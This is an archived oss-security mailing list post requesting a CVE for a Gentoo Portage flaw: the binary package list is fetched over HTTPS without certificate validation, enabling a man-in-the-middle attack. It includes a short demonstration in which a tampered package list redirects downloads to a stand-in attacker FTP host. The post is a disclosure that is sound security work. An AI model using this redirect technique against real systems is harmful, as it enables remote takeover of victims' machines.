Products Openwall GNU/*/Linux   server OS Linux Kernel Runtime Guard John the Ripper   password cracker Free & Open Source for any platform in the cloud Pro for Linux Pro for macOS Wordlists   for password cracking passwdqc   policy enforcement Free & Open Source for Unix Pro for Windows (Active Directory) yescrypt   KDF & password hashing yespower   Proof-of-Work (PoW) crypt_blowfish   password hashing phpass   ditto in PHP tcb   better password shadowing Pluggable Authentication Modules scanlogd   port scan detector popa3d   tiny POP3 daemon blists   web interface to mailing lists msulogin   single user mode login php_mt_seed   mt_rand() cracker Services Publications Articles Presentations Resources Mailing lists Community wiki Source code repositories (GitHub) Source code repositories (CVSweb) File archive & mirrors How to verify digital signatures OVE IDs What's new

Message-ID: <CAHmME9rKeh0c1PCGybzR3Vmo8kJnaVUQFDJk45718N3O=UOwvA@mail.gmail.com>
Date: Wed, 15 May 2013 12:46:57 +0200
From: "Jason A. Donenfeld" <Jason@...c4.com>
To: oss-security <oss-security@...ts.openwall.com>
Cc: Gentoo Security <security@...too.org>, zx2c4@...too.org
Subject: CVE Request: Man in the middle on Gentoo Portage binary package installer

Hi Kurt,

Portage is the package manager of Gentoo Linux. It supports many
features, one of which is the ability to synchronize against a remote
list of binary packages, and use that list to determine where to fetch
such binary packages. One of the fields in this list of packages is
URI:

    victim # curl -s -k https://portage-build.zx2c4.com/Packages | grep URI:
    URI: ftp://horrible.attacker.somewhere.on.the.internet/blah

    victim # emerge -1 portage-utils
    Calculating dependencies... done!

    >>> Emerging binary (1 of 1) app-portage/portage-utils-0.30 from gentoo
    --2013-05-15 12:33:32--
ftp://horrible.attacker.somewhere.on.the.internet/blah/app-portage/portage-utils-0.30.tbz2
               => ‘/usr/portage/packages/app-portage/portage-utils-0.30.tbz2’
    Resolving horrible.attacker.somewhere.on.the.internet...

Over insecure connections, Portage provides the ability to use HTTPS
(in addition to SFTP and SSH), so that this remote list of binary
packages is not tampered with. This list of binary packages will be
downloaded in the background silently. Unfortunately, Portage does not
validate the SSL certificates, leaving this open to a trivial man in
the middle attack. An attacker could leverage this man in the middle
vector to remotely gain complete control over a victim's machine,
since Portage runs with essentially full permissions.

I reported this to the maintainer of Portage in Gentoo Bug #469888
[1], and it was fixed in commit b5969af9f5 [2].

Do note that while this commit solves the immediate problem with
fetching /Packages, as detailed above, there may be other additional
unconfirmed insecure uses of the vulnerable urlopen() function that
have not yet been analyzed or fixed.

Thanks,
Jason


[1] https://bugs.gentoo.org/show_bug.cgi?id=469888
[2] http://git.overlays.gentoo.org/gitweb/?p=proj/portage.git;a=commit;h=b5969af9f575e4e4b669f44e76ad01f0dbc2dd27

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.